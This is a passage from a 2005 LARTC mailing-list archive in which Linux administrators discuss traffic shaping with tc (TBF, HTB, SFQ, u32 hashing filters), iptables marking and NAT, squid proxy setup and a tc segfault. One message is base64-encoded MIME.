flow, the token rate will be automatically ta= ken and i dont have to set it, right? Thank you for ur time... regards sanjeev ----- Original Message ----- From: "Stef Coene" To: lartc@mailman.ds9a.nl Subject: Re: [LARTC] Need help regarding TBF Token rate setting Date: Wed, 12 Jan 2005 18:44:46 +0100 >=20 > On Tuesday 11 January 2005 12:21, sanjeev ravindran wrote: > > Hi, > > > > I would like to know how to specify the token rate when a tbf qdic is > > created using tc tool.. Will it be a default value when tbf qdisc is > > created? > http://lartc.org/manpages/tc-tbf.html > The token fill rate is rate / timer (Hz) >=20 > Stef > _______________________________________________ > LARTC mailing list / LARTC@mailman.ds9a.nl > http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/ --=20 ______________________________________________ Check out the latest SMS services @ http://www.linuxmail.org=20 This allows you to send and receive SMS through your mailbox. Powered by Outblaze From prarams@yahoo.co.in Thu Jan 13 08:13:18 2005 From: prarams@yahoo.co.in (raamaraju birudaraju) Date: Thu, 13 Jan 2005 08:13:18 +0000 (GMT) Subject: [LARTC] traffic routing Message-ID: <20050113081318.46688.qmail@web8509.mail.in.yahoo.com> --0-1913037930-1105603998=:46409 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Hi to all I have a linux box installed redhat enterprise linux es 3 with 2 NIC's and i have configured squid web proxy for my lan network.what i want is 1. all my lan customers should use proxy 2.all my lan customers should be able to use yahoo messenger,msn messenger and they should be able to use yahoo voice chat and web cam features when they use through proxy. 3.i want to block p2p softwares from my lan customers as they are eating bandwidth a lot. please do help me how to do this using squid and iptables to allow only few ports for yahoo messenger and block remaining ports thanks in advance ramu. Yahoo! India Matrimony: Find your life partneronline. --0-1913037930-1105603998=:46409 Content-Type: text/html; charset=iso-8859-1 Content-Transfer-Encoding: 8bit
Hi to all
 
I have a linux box installed redhat enterprise linux es 3 with 2 NIC's and i have configured squid web proxy for my lan network.what i want is
 
1. all my lan customers should use proxy
2.all my lan customers should be able to use yahoo messenger,msn messenger and they should be able to use yahoo voice chat and web cam features when they use through proxy.
3.i want to block p2p softwares from my lan customers as they are eating bandwidth a lot.
 
 
please do help me how to do this using squid and iptables to allow only few ports for yahoo messenger and block remaining ports
 
 
thanks in advance
 
ramu.

Yahoo! India Matrimony: Find your life partner online. --0-1913037930-1105603998=:46409-- From tomasz.paszkowski@e-wro.pl Thu Jan 13 09:06:29 2005 From: tomasz.paszkowski@e-wro.pl (Tomasz Paszkowski) Date: Thu, 13 Jan 2005 10:06:29 +0100 Subject: [LARTC] hashing filters In-Reply-To: <05ea01c4f8d1$a897a3e0$3400010a@ipkopb2qcn7w4z> References: <055901c4f8a2$0edbe920$3400010a@ipkopb2qcn7w4z> <20050112131121.GA5641@krezus.e-wro.net> <05ea01c4f8d1$a897a3e0$3400010a@ipkopb2qcn7w4z> Message-ID: <20050113090629.GB29469@krezus.e-wro.net> --RASg3xLB4tUQ4RcS Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Wed, Jan 12, 2005 at 07:08:03PM +0100, Valton Hashani wrote: change te script to: i=3D0; while [ $i -le 254 ] do hexi=3D`echo "obase=3D16; $i" | bc` tc filter add dev eth0 protocol ip parent 1:2 u32 ht 2:$hexi: match ip dst= 192.168.$j.$i flowid 1:3 i=3D$((i+1)) done connected with modifications from previous mail it should work. --=20 Tomasz Paszkowski Administrator Miejskie Sieci Informatyczne e-wro http://www.e-wro.pl --RASg3xLB4tUQ4RcS Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (GNU/Linux) iD8DBQFB5joVcNXOL98XeysRAur/AJkBcbCZkdsxO1+077EeaBEdn4ZT4wCfft1+ p0QvY3C9Fe6kTZAdFe5LbDc= =aS4w -----END PGP SIGNATURE----- --RASg3xLB4tUQ4RcS-- From andy.furniss@dsl.pipex.com Thu Jan 13 10:09:16 2005 From: andy.furniss@dsl.pipex.com (Andy Furniss) Date: Thu, 13 Jan 2005 10:09:16 +0000 Subject: [LARTC] Could anyone explain the slot and bucket concept in SFQ to me? In-Reply-To: <200501101527.j0AFRG77008922@mx4.ust.hk> References: <200501101527.j0AFRG77008922@mx4.ust.hk> Message-ID: <41E648CC.8020107@dsl.pipex.com> Wang Feng wrote: > Dear all, > > I'm reading codes in sch_sqf.c in kernel 2.4 of Linux. > I find I messed up with the concept of slot, bucket and hash tables. I get messed up too when I read it. You can play with the values if you use ESFQ. I can't explain in detail but at high level - Slot is linked list of packets whose IPs + src port (if TCP/UDP) hash into same hash bin/bucket. Slots get dequed in turn using DRR. Hash buckets/bins (1024 of by default) is the what hash function maps to, to try and seperate flows. You can make it bigger with esfq so hopefully get less chance of different flows mapping to same bin and so their packets ending up being queued in same slot. Could > anyone explain the data stucture of the hash tables a little to me. > > Thanks very much. > > Best, > Franklin > > BTW: I can not understand why the number of entries of dep[SFQ_DEPTH*] > should be twice:( Don't know but esfq defines pointer rather than array here. Andy. From karyon@ukr.net Thu Jan 13 10:10:21 2005 From: karyon@ukr.net (karyon@ukr.net) Date: Thu, 13 Jan 2005 12:10:21 +0200 Subject: [LARTC] IpRoute + NAT problem Message-ID: <6787949514.20050113121021@ukr.net> SGksIEFsbA0KDQoNClNvcnJ5IGZvciBFbmdsaXNoDQpCdXQgSSBuZWVkIG5ldyBpZGVhcyBm b3IgbXkgcHJvYmxlbQ0KDQpJIGhhdmUgYSBsb2NhbCBuZXR3b3JrLCBzZXJ2ZXIgd2l0aCAy IEludGVybmV0IGNoYW5uZWxzDQpMb2NhbCBjb21wdXRlcnMgY29ubmVjdCB0byBzZXJ2ZXIg dmlhIFZQTi4NClRhc2s6IHNvbWUgdXNlcnMgZ28gdG8gSW50ZXJuZXQgdGhyb3VnaCBmaXJz dCBJbnRlcm5ldCBjaGFubmVsIG90aGVyDQp0aHJvdWdoIHNlY29uZC4NClN5c3RlbSBTdXNl IDkuMiwga2VybmVsIDIuNi44Lg0KSSByZWFkIGlwcm91dGUgZG9jdW1lbnRhaW9uIGFuZCBj b25maWd1cmVkIHJvdXRlcy4gUGluZyBmcm9tIHNlcnZlcg0KZ28gdGhyb3VnaCAyIGNoYW5u ZWxzLg0KcGluZyAtSSBldGhfaW5ldDEgd3d3LnlhLnJ1IC0gUmVwbHkuLi4NCnBpbmcgLUkg ZXRoX2luZXQyIHd3dy55YS5ydSAtIFJlcGx5Li4uDQoNClBST0JMRU06IHNlcnZlciBtdXN0 IE1BU1FVRVJBREUgbG9jYWwgdXNlcnMgKFZQTiAtIGNsaWVudHMpIGNvbm5lY3Rpb24NCmFu ZCB0aGVuIHBhc3MgdGhlbSB0byBJbnRlcm5ldC4gRnJvbSBWUE4gY2xpZW50cyBOTyBjb25u ZWN0aW9uIChubw0KcGluZykgdG8gSW50ZXJuZXQgKGxvZ3MgYmVsb3cpLg0KDQpNQVNRVUVS QURFIGluIGlwdGFibGVzIEkgcmVwbGFjZWQgd2l0aCBTTkFUIHJ1bGUgLCBiZWNvdXNlIE1B U1Egd2l0aA0Ka2VybmVsIDIuNiwgaXByb3V0ZTIg6CBtdWx0aXBsZSByb3V0aW5nIHRhYmxl cyBsb2dzIHRoYXQ6DQo+TUFTUVVFUkFERSBrZXJuZWw6IFJvdXRlIHNlbnQgdXMgc29tZXdo ZXJlIGVsc2UuDQpTTkFUIHdvcmtzLg0KDQoNClNpbXBsaWVyIHRhc2s6IHRoZXJlaXMgT25l IEludGVybmV0IGludGVyZmFjZSwgYnV0IEkgd2FudCB0byBnbyB0bw0KSW50ZXJuZXQgdGhy b3VnaHQgaXByb3V0ZSBydWxlcyAtIHRoZXJlaXMgbm8gZGVmYXVsdCBnYXRld2F5IGluIHRh YmxlDQptYWluLiBWUE4gY2xpZW50cyBhbmQgb3RoZXIgY29uZGl0aW9ucyBhcmUgcHJlc2Vu dC4NCiBJbnRlcm5ldCBnYXRld2F5IC0gMTkyLjE2OC4yMS4yNTQgKHRoZSBzYW1lIG5ldHdv cmsgd2l0aCBzZXJ2ZXIpDQoNCg0KU2VydmVyIGluZm86DQoNCmlmY29uZmlnOg0KZXRoMCBM aW5rIGVuY2FwOiBFdGhlcm5ldCBpbmV0IGFkZHI6MTkyLjE2OC4yMS4yMTAgDQoNClZQTiBz ZXJ2ZXIgbGlzdGVuIG9uIHRoaXMgaW50ZXJmYWNlLg0KDQpDb25uZWN0ZWQgVlBOIGNsaWVu dCBpbnRlcmZhY2U6DQoNCnBwcDAgTGluayBlbmNhcDogUG9pbnQtdG8tUG9pbnQgUHJvdG9j b2wNCmluZXQgYWRkcjoxNzIuMjMuMS4xIFAtdC1QOjE3Mi4yMy4xLjMgTWFzazoyNTUuMjU1 LjI1NS4yNTUNCg0KPj4gaXAgcnVsZSBzaG93DQowOiBmcm9tIGFsbCBsb29rdXAgbG9jYWwN CjMyNzU5OiBmcm9tIDE3Mi4yMy4xLjMgbG9va3VwIGluZXQNCjMyNzY1OiBmcm9tIDE5Mi4x NjguMjEuMjEwIGxvb2t1cCBpbmV0DQozMjc2NjogZnJvbSBhbGwgbG9va3VwIG1haW4NCjMy NzY3OiBmcm9tIGFsbCBsb29rdXAgZGVmYXVsdA0KDQo+PiBpcCByb3V0ZSBzaG93IHRhYmxl IGxvY2FsDQpsb2NhbCAxOTIuMTY4LjIxLjIxMCBkZXYgZXRoMCBwcm90byBrZXJuZWwgc2Nv cGUgaG9zdCBzcmMgMTkyLjE2OC4yMS4yMTANCmJyb2FkY2FzdCAxMjcuMjU1LjI1NS4yNTUg ZGV2IGxvIHByb3RvIGtlcm5lbCBzY29wZSBsaW5rIHNyYyAxMjcuMC4wLjENCmxvY2FsIDE3 Mi4yMy4xLjEgZGV2IHBwcDAgcHJvdG8ga2VybmVsIHNjb3BlIGhvc3Qgc3JjIDE3Mi4yMy4x LjENCmJyb2FkY2FzdCAxOTIuMTY4LjIxLjAgZGV2IGV0aDAgcHJvdG8ga2VybmVsIHNjb3Bl IGxpbmsgc3JjIDE5Mi4xNjguMjEuMjEwDQpicm9hZGNhc3QgMTkyLjE2OC4yMS4yNTUgZGV2 IGV0aDAgcHJvdG8ga2VybmVsIHNjb3BlIGxpbmsgc3JjIDE5Mi4xNjguMjEuMjEwDQpicm9h ZGNhc3QgMTI3LjAuMC4wIGRldiBsbyBwcm90byBrZXJuZWwgc2NvcGUgbGluayBzcmMgMTI3 LjAuMC4xDQpsb2NhbCAxMjcuMC4wLjEgZGV2IGxvIHByb3RvIGtlcm5lbCBzY29wZSBob3N0 IHNyYyAxMjcuMC4wLjENCjE5Mi4xNjguMjEuMC8yNCBkZXYgZXRoMCBwcm90byBrZXJuZWwg c2NvcGUgbGluayBzcmMgMTkyLjE2OC4yMS4yMTANCmxvY2FsIDEyNy4wLjAuMC84IGRldiBs byBwcm90byBrZXJuZWwgc2NvcGUgaG9zdCBzcmMgMTI3LjAuMC4xDQoNCj4+aXAgcm8gc2hv dyB0YWJsZSBtYWluDQoxNzIuMjMuMS4zIGRldiBwcHAwIHByb3RvIGtlcm5lbCBzY29wZSBs aW5rIHNyYyAxNzIuMjMuMS4xDQoxOTIuMTY4LjIxLjAvMjQgZGV2IGV0aDAgcHJvdG8ga2Vy bmVsIHNjb3BlIGxpbmsgc3JjIDE5Mi4xNjguMjEuMjEwDQoxNjkuMjU0LjAuMC8xNiBkZXYg ZXRoMCBzY29wZSBsaW5rDQoxMjcuMC4wLjAvOCBkZXYgbG8gc2NvcGUgbGluaw0KDQo+Pmlw IHJvIHNob3cgdGFibGUgaW5ldA0KMTkyLjE2OC4yMS4wLzI0IGRldiBldGgwIHByb3RvIGtl cm5lbCBzY29wZSBsaW5rIHNyYyAxOTIuMTY4LjIxLjIxMCANCmRlZmF1bHQgdmlhIDE5Mi4x NjguMjEuMjU0IGRldiBldGgwDQoNCj4+aXB0YWJsZXMNCmZpbHRlcjoNCklOUFVUIEFDQ0VQ VA0KT1VUUFVUIEFDQ0VQVA0KRk9SV0FSRCANCi1BIEZPUldBUkQgLWQgMjEzLjE4MC4xOTMu MTIzIC1qIExPRyAtLWxvZy1wcmVmaXggIlRPIFlBTkRFWCAiDQotQSBGT1JXQVJEIC1zIDIx My4xODAuMTkzLjEyMyAtaiBMT0cgLS1sb2ctcHJlZml4ICJGUk9NIFlBTkRFWCAiDQotQSBG T1JXQVJEIC1qIEFDQ0VQVA0KDQpuYXQ6DQotQSBQUkVST1VUSU5HIC1kICEgMTkyLjE2OC4w LjAvMjU1LjI1NS4wLjAgLWogTE9HIC0tbG9nLXByZWZpeCAiUFJFUk9VVElORzogIg0KLUEg UFJFUk9VVElORyAtaiBBQ0NFUFQNCg0KLUEgUE9TVFJPVVRJTkcgLXMgISAxOTIuMTY4LjAu MC8yNTUuMjU1LjAuMCAtaiBMT0cgLS1sb2ctcHJlZml4ICJQT1NUUk9VVElORzogIg0KLUEg UE9TVFJPVVRJTkcgLXMgMTcyLjIzLjEuMC8yNTUuMjU1LjI1NS4wIC1kICEgMTkyLjE2OC4w LjAvMjU1LjI1NS4wLjAgLWogU05BVCAtLXRvLXNvdXJjZSAxOTIuMTY4LjIxLjIxMA0KDQo+ PnBpbmcgLUkgMTkyLjE2OC4yMS4yMTAgd3d3LnlhLnJ1DQp0aGVyZWlzIHJlcGx5DQoNCj4+ IHBpbmcgd3d3LnlhLnJ1DQpjb25uZWN0OiBOZXR3b3JrIGlzIHVucmVhY2hhYmxlIA0KDQpG cm9tIHdoYXQgaW50ZXJmYWNlIGJ5IGRlZmF1bHQgcGluZyB3b3Jrcz8gSG93IGNhbiBJIHZp ZXcgZGVidWcvbG9nDQppbmZvcm1hdGlvbiBhYm91dCBpdD8NCg0KRnJvbSBWUE4gY2xpZW50 DQo+PnBpbmcgd3d3LnlhLnJ1DQp0aGVyZSBpcyBOTyByZXBseQ0KDQpJcHRhYmxlcyBsb2dz IGR1cmluZyBwaW5nOg0KDQpKYW4gMTEgMTk6MzU6MzcgU2t5UG9ydCBrZXJuZWw6IFBSRVJP VVRJTkc6IElOPXBwcDAgT1VUPSBNQUM9IFNSQz0xNzIuMjMuMS4zIERTVD0yMTMuMTgwLjE5 My4xMjMgTEVOPTYwIFRPUz0weDAwIFBSRUM9MHgwMCBUVEw9MTI4IElEPTgzNzcgUFJPVE89 SUNNUCBUWVBFPTggQ09ERT0wIElEPTEwMjQgU0VRPTE3OTINCkphbiAxMSAxOTozNTozNyBT a3lQb3J0IGtlcm5lbDogVE8gWUFOREVYIElOPXBwcDAgT1VUPWV0aDAgU1JDPTE3Mi4yMy4x LjMgRFNUPTIxMy4xODAuMTkzLjEyMyBMRU49NjAgVE9TPTB4MDAgUFJFQz0weDAwIFRUTD0x MjcgSUQ9ODM3NyBQUk9UTz1JQ01QIFRZUEU9OCBDT0RFPTAgSUQ9MTAyNCBTRVE9MTc5Mg0K SmFuIDExIDE5OjM1OjM3IFNreVBvcnQga2VybmVsOiBQT1NUUk9VVElORzogSU49IE9VVD1l dGgwIFNSQz0xNzIuMjMuMS4zIERTVD0yMTMuMTgwLjE5My4xMjMgTEVOPTYwIFRPUz0weDAw IFBSRUM9MHgwMCBUVEw9MTI3IElEPTgzNzcgUFJPVE89SUNNUCBUWVBFPTggQ09ERT0wIElE PTEwMjQgU0VRPTE3OTINCkphbiAxMSAxOTozNTozOCBTa3lQb3J0IGtlcm5lbDogRlJPTSBZ QU5ERVggSU49ZXRoMCBPVVQ9cHBwMCBTUkM9MjEzLjE4MC4xOTMuMTIzIERTVD0xNzIuMjMu MS4zIExFTj02MCBUT1M9MHgwMCBQUkVDPTB4MDAgVFRMPTUxIElEPTU2NDAxIFBST1RPPUlD TVAgVFlQRT0wIENPREU9MCBJRD0xMDI0IFNFUT0xNzkyDQpBbmQgaGVyZSBpcyBubyBwYWNr ZXQgb3V0Z291aW5nIHBwcDEgdG8gVlBOIGNsaWVudC4NCg0KDQpCdXQgaWYgYWRkaXRpb25h bCB0eXBlIG5leHQgY29tbWFuZHM6DQppcCByb3V0ZSBhZGQgMTcyLjIzLjEuMyBkZXYgcHBw MCBwcm90byBrZXJuZWwgc2NvcGUgbGluayBzcmMgMTcyLjIzLjEuMSB0YWJsZSBpbmV0DQpp cCBydWxlIGFkZCBmcm9tIGFueSBsb29rdXAgaW5ldA0KDQp0aGVuIHdvcmtzDQpwaW5nIHd3 dy55YS5ydSBmcm9tIHNlcnZlciBhbmQgZnJvbSBWUE4gY2xpZW50LCBidXQgaXQncyB0aGUg c2FtZSBhcw0KZ2VuZXJhbCBkZWZhdWx0IGdhdGV3YXkuDQogDQpUaGVyZSBpcyBteSBtaXN0 YWtlPyBXaHkgVlBOIGNsaWVudCBjYW4ndCBnbyB0byBJbnRlcm5ldCYNCg0KLS0gDQpCZXN0 IHJlZ2FyZHMsDQoga2FyeW9uICAgICAgICAgICAgICAgICAgICAgICAgICBtYWlsdG86a2Fy eW9uQHVrci5uZXQNCg== From andy.furniss@dsl.pipex.com Thu Jan 13 12:27:54 2005 From: andy.furniss@dsl.pipex.com (Andy Furniss) Date: Thu, 13 Jan 2005 12:27:54 +0000 Subject: [LARTC] How to balance OUTBOUND traffic by packet if.. In-Reply-To: <41E5E91C.6050606@dsl.pipex.com> References: <1483.192.168.1.2.1105403313@maild.mine.nu> <41E5E91C.6050606@dsl.pipex.com> Message-ID: <41E6694A.2020203@dsl.pipex.com> Andy Furniss wrote: > junk@maild.mine.nu wrote: > >> I am still looking for a solution to this problem....... >> >>> junk@maild.mine.nu wrote: >>> >>>> Hi, >>>> Yes i did give this a try a couple of times before with no success >>>> >>>> /sbin/iptables -I OUTPUT -m nth --every 2 --packet 1 -t mangle -j MARK >>>> --set-mark 0x2 >>>> /sbin/iptables -I OUTPUT -m nth --every 2 --packet 0 -t mangle -j MARK >>>> --set-mark 0x1 > > > Had a go at this on 2.6.9 / iptables 1.2.11 and it seeems nth is broken. > > I'll try again tomorrow. Seems still broken. I built vanilla(apart from nth) 2.6.10, new iptables 1.2.11 + pom-200400621 with runme extra only said y to nth. I see - Chain OUTPUT (policy ACCEPT 817 packets, 103K bytes) pkts bytes target prot opt in out source destination 15 1260 MARK all -- * eth0 0.0.0.0/0 0.0.0.0/0 every 2th packet #0 MARK set 0x1 15 1260 MARK all -- * eth0 0.0.0.0/0 0.0.0.0/0 every 2th packet #1 MARK set 0x2 Chain POSTROUTING (policy ACCEPT 817 packets, 103K bytes) pkts bytes target prot opt in out source destination 0 0 all -- * eth0 0.0.0.0/0 0.0.0.0/0 MARK match 0x1 15 1260 all -- * eth0 0.0.0.0/0 0.0.0.0/0 MARK match 0x2 [root@amd /home/andy]# cat ./nth-test iptables -t mangle -A OUTPUT -o eth0 -m nth --counter 1 --every 2 --packet 0 -j MARK --set-mark 1 iptables -t mangle -A OUTPUT -o eth0 -m nth --counter 1 --every 2 --packet 1 -j MARK --set-mark 2 iptables -t mangle -A POSTROUTING -o eth0 -m mark --mark 1 iptables -t mangle -A POSTROUTING -o eth0 -m mark --mark 2 Any Ideas anyone? TIA Andy. From Johan Jordaan Thu Jan 13 13:02:46 2005 From: Johan Jordaan (Johan Jordaan) Date: Thu, 13 Jan 2005 13:02:46 +0000 Subject: [LARTC] Bandwidth management under linux Message-ID: <8105747b0501130502342acdca@mail.gmail.com> In my search to control bandwidth on my network I found 2 projects.. 1. TC 2. BWM Tools - http://freshmeat.net/projects/bwmtools/ This brings me to 2 questions... Firstly, can TC control bandwidth in both directions? I read that it can only do 1 direction, which one I cant remember. Can you monitor the load on the queues you define? Does TC support IPv6? Secondly, BWM Tools seems to queue traffic to userspace and use some kind of kernel module to allow it through or not. How efficient is bandwidth control using ip queing to userspace? BWM Tools doesn't seem to support IPv6 :( If anyone else knows of a way I can shape traffic, please let me know. Regards Johan From andy.furniss@dsl.pipex.com Thu Jan 13 13:05:24 2005 From: andy.furniss@dsl.pipex.com (Andy Furniss) Date: Thu, 13 Jan 2005 13:05:24 +0000 Subject: [LARTC] Slow large pings In-Reply-To: <729574587.20050109133610@inbox.lv> References: <729574587.20050109133610@inbox.lv> Message-ID: <41E67214.2070808@dsl.pipex.com> kasp wrote: > Hello lartc, > > Testing some rules I found out that any rules are slowing down large pings! I can't reproduce this. > For example: > > tc qdisc add dev eth0 root handle 1: htb > tc class add dev eth0 parent 1: classid 1:1 htb rate 100Mbit prio 1 ceil 100Mbit > tc class add dev eth0 parent 1:1 classid 1:2 htb rate 100Mbit prio 2 ceil 100Mbit > tc filter add dev eth0 parent 1:0 prio 5 u32 \ Error for me unless I add protocol ip > match ip src 10.10.10.1 \ > match ip dst 10.10.10.10 \ > flowid 1:2 > tc qdisc add dev eth0 parent 1:2 handle 2: sfq perturb 10 > > Small pings are ok - <10ms, here is output for 65500 byte pings: 10ms is high I get 0.3 with p200mmx +rtl8139 + cheapest switch I could find + cables made without crimping tool. > > Pinging test [10.10.10.1] with 65500 bytes of data: > > Reply from 10.10.10.1: bytes=65500 time=120ms TTL=64 > Reply from 10.10.10.1: bytes=65500 time=120ms TTL=64 > Reply from 10.10.10.1: bytes=65500 time=120ms TTL=64 > Reply from 10.10.10.1: bytes=65500 time=120ms TTL=64 > I see 14ms > Ping statistics for 10.10.10.1: > Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), > Approximate round trip times in milli-seconds: > Minimum = 120ms, Maximum = 120ms, Average = 120ms > > If I don't use any rules, 65500 byte pings are about ~10ms > Any filters are slowing large pings for 10 times!!! > What can I do to tune it up? > What kernel and hardware are you using? Andy. From stef.coene@docum.org Thu Jan 13 14:07:41 2005 From: stef.coene@docum.org (Stef Coene) Date: Thu, 13 Jan 2005 15:07:41 +0100 Subject: [LARTC] Bandwidth management under linux In-Reply-To: <8105747b0501130502342acdca@mail.gmail.com> References: <8105747b0501130502342acdca@mail.gmail.com> Message-ID: <200501131507.41996.stef.coene@docum.org> On Thursday 13 January 2005 14:02, Johan Jordaan wrote: > In my search to control bandwidth on my network I found 2 projects.. > > 1. TC > 2. BWM Tools - http://freshmeat.net/projects/bwmtools/ > > This brings me to 2 questions... > > Firstly, can TC control bandwidth in both directions? It can shape outgoing traffic. If you have 2 network cards, you can shape in bothe directions. But it can also throtlle incoming traffic if you want (this is not so powerfull as shaping outgoing traffic). > I read that it > can only do 1 direction, which one I cant remember. Outgoing. > Can you monitor > the load on the queues you define? Yes, with external scripting. > Does TC support IPv6? Yes (I think) > Secondly, BWM Tools seems to queue traffic to userspace and use some > kind of kernel module to allow it through or not. How efficient is > bandwidth control using ip queing to userspace? BWM Tools doesn't seem > to support IPv6 :( I don't know how BWM works. Stef From stef.coene@docum.org Thu Jan 13 14:09:16 2005 From: stef.coene@docum.org (Stef Coene) Date: Thu, 13 Jan 2005 15:09:16 +0100 Subject: [LARTC] Need help regarding TBF Token rate setting In-Reply-To: <20050113053722.8D7F92B2B86@ws5-7.us4.outblaze.com> References: <20050113053722.8D7F92B2B86@ws5-7.us4.outblaze.com> Message-ID: <200501131509.16731.stef.coene@docum.org> On Thursday 13 January 2005 06:37, sanjeev ravindran wrote: > Thank you so much for ur response Stef, > > I have one more doubt that I would like to clear... If I set the rate in > kbps at which i want my data to flow, the token rate will be automatically > taken and i dont have to set it, right? Indeed. Just set the desited rate. Stef From netf@death.pl Thu Jan 13 15:17:21 2005 From: netf@death.pl (netf@death.pl) Date: Thu, 13 Jan 2005 16:17:21 +0100 (CET) Subject: [LARTC] tc class ls dev (device) ... segfault. Message-ID: <53559.81.15.165.20.1105629441.squirrel@81.15.165.20> Hello. I have got strange problem with tc utility (iproute2-ss001007) on linux 2.4.18. No matter what rules i am going to test, the resul of 'tc class ls/show' is always the same : ATSLite ()# tc -s class ls dev eth1 do_page_fault() #2: sending SIGSEGV to tc for illegal read access from 00000000 (epc == 00000000, ra == 00408750) Segmentation fault tc -s qdisc ls , tc -s filter ls ... works well. shaping, qos works well too. Does anybody can help me with solving this problem? Thx in advance. ps. I can't change kernel etc .. coz it's the only one kernel i can run on AP based on rtl8181 - planet wap-1963a From bigworld@ua.fm Fri Jan 14 05:02:12 2005 From: bigworld@ua.fm (Big World) Date: Fri, 14 Jan 2005 00:02:12 -0500 Subject: [LARTC] problem with mark, need help Message-ID: Hello. I have eth1 for WAN(0.0.0.0) and eth0 for LAN (192.168.10.0/24), need to setup that local user get access to $LOCAL_IP network and ip 192.168.10.2, 192.168.10.3 (will be more in future) to internet, but bandwidth to $LOCAL_IP is 128kbps and for internet is 8kbps. i wrote rc.firewall #!/bin/bash #env IPTABLES="/usr/sbin/iptables" LOCAL_IP="62.64.80.0/21 62.221.38.0/24 ........................" # LOCAL_IP network $IPTABLES -P INPUT DROP $IPTABLES -P OUTPUT DROP $IPTABLES -P FORWARD DROP ......... # not important rule ........ #for local_network $IPTABLES -N local_ip for net_address in $LOCAL_IP; do $IPTABLES -A local_ip -p all -d $net_address -j ACCEPT done $IPTABLES -A local_ip -p all -j REJECT # Forward rules for all $IPTABLES -A FORWARD -m state --state ESTABLISHED,RELATED -i eth1 -j ACCEPT $IPTABLES -A FORWARD -s 192.168.10.2 -m mac --mac-source 00:11:2F:92:D1:5E -j ACCEPT $IPTABLES -A FORWARD -s 192.168.10.3 -m mac --mac-source 00:11:11:1D:D6:37 -j ACCEPT $IPTABLES -A FORWARD -s 192.168.10.5 -m mac --mac-source 00:11:2F:4A:88:47 -j local_ip $IPTABLES -A FORWARD -s 192.168.10.6 -m mac --mac-source 00:0E:A6:52:76:DD -j local_ip .............. # IF file isn't from $LOCAL_IP for net_address in $LOCAL_IP; do $IPTABLES -t mangle -A FORWARD -s ! $net_address -d 192.168.10.2 -j MARK --set-mark 3 $IPTABLES -t mangle -A FORWARD -s ! $net_address -d 192.168.10.3 -j MARK --set-mark 4 done # If ip address is from the $LOCAL_IP for net_address in $LOCAL_IP; do $IPTABLES -t mangle -A FORWARD -s $net_address -d 192.168.10.2 -j MARK --set-mark 1 $IPTABLES -t mangle -A FORWARD -s $net_address -d 192.168.10.3 -j MARK --set-mark 2 done # Enable simple IP Forwarding and Network Address Translation $IPTABLES -t nat -A POSTROUTING -o eth1 -j SNAT --to-source 195.24.150.150 I marked package that could use it for control bandwidth, but if package from $LOCAL_IP to 192.168.10.2 it will be marked two time (mark 3 then mark 1). Why iptables doing it? # config bandwidth #!/bin/bash TC=/sbin/tc $TC qdisc add dev eth0 root handle 1:0 htb default 4 # sub class of root $TC class add dev eth0 parent 1:0 classid 1:1 htb rate 136kbps ceil 136kbps $TC class add dev eth0 parent 1:1 classid 1:2 htb rate 128kbps ceil 128kbps $TC class add dev eth0 parent 1:1 classid 1:3 htb rate 8kbps ceil 8kbps # Classes for local users $TC class add dev eth0 parent 1:2 classid 1:20 htb rate 16kbps ceil 128kbps $TC class add dev eth0 parent 1:2 classid 1:21 htb rate 16kbps ceil 128kbps $TC class add dev eth0 parent 1:2 classid 1:22 htb rate 16kbps ceil 128kbps $TC class add dev eth0 parent 1:2 classid 1:23 htb rate 16kbps ceil 128kbps $TC filter add dev eth0 protocol ip parent 1:0 handle 1 fw flowid 1:20 $TC filter add dev eth0 protocol ip parent 1:0 handle 2 fw flowid 1:21 $TC filter add dev eth0 protocol ip parent 1:0 u32 match ip dst 192.168.10.5 flowid 1:22 $TC filter add dev eth0 protocol ip parent 1:0 u32 match ip dst 192.168.10.6 flowid 1:23 # Classes for inet users $TC class add dev eth0 parent 1:3 classid 1:30 htb rate 4kbps ceil 8kbps $TC class add dev eth0 parent 1:3 classid 1:31 htb rate 4kbps ceil 8kbps $TC filter add dev eth0 protocol ip parent 1:0 handle 3 fw flowid 1:30 $TC filter add dev eth0 protocol ip parent 1:0 handle 4 fw flowid 1:31 # default param for htb $TC class add dev eth0 parent 1:1 classid 1:4 htb rate 1kbps ceil 1kbps If someone know why iptables doing it or how to realize it differently Thanks for any halp. From shemminger@osdl.org Thu Jan 13 21:28:15 2005 From: shemminger@osdl.org (Stephen Hemminger) Date: Thu, 13 Jan 2005 13:28:15 -0800 Subject: [LARTC] tc class ls dev (device) ... segfault. In-Reply-To: <53559.81.15.165.20.1105629441.squirrel@81.15.165.20> References: <53559.81.15.165.20.1105629441.squirrel@81.15.165.20> Message-ID: <20050113132815.30cd1b67@dxpl.pdx.osdl.net> On Thu, 13 Jan 2005 16:17:21 +0100 (CET) netf@death.pl wrote: > Hello. > I have got strange problem with tc utility (iproute2-ss001007) on linux > 2.4.18. > No matter what rules i am going to test, the resul of 'tc class ls/show' > is always the same : > ATSLite ()# tc -s class ls dev eth1 > do_page_fault() #2: sending SIGSEGV to tc for illegal read access from > 00000000 (epc == 00000000, ra == 00408750) > Segmentation fault > > tc -s qdisc ls , tc -s filter ls ... works well. > shaping, qos works well too. > > Does anybody can help me with solving this problem? > Thx in advance. > > ps. > I can't change kernel etc .. coz it's the only one kernel i can run on AP > based on rtl8181 - planet wap-1963a Are you using a current version of the iproute2 utilities? One of the bugs I fixed about 6 months ago when I took over maintance was teaching tc about the builtin pfifo_fast qdisc. From kaber@trash.net Fri Jan 14 02:08:02 2005 From: kaber@trash.net (Patrick McHardy) Date: Fri, 14 Jan 2005 03:08:02 +0100 Subject: [LARTC] How to balance OUTBOUND traffic by packet if.. In-Reply-To: <41E6694A.2020203@dsl.pipex.com> References: <1483.192.168.1.2.1105403313@maild.mine.nu> <41E5E91C.6050606@dsl.pipex.com> <41E6694A.2020203@dsl.pipex.com> Message-ID: <41E72982.5000205@trash.net> Andy Furniss wrote: > Seems still broken. > > I built vanilla(apart from nth) 2.6.10, new iptables 1.2.11 + > pom-200400621 with runme extra only said y to nth. > > I see - > > Chain OUTPUT (policy ACCEPT 817 packets, 103K bytes) > pkts bytes target prot opt in out source destination > 15 1260 MARK all -- * eth0 0.0.0.0/0 > 0.0.0.0/0 every 2th packet #0 MARK set 0x1 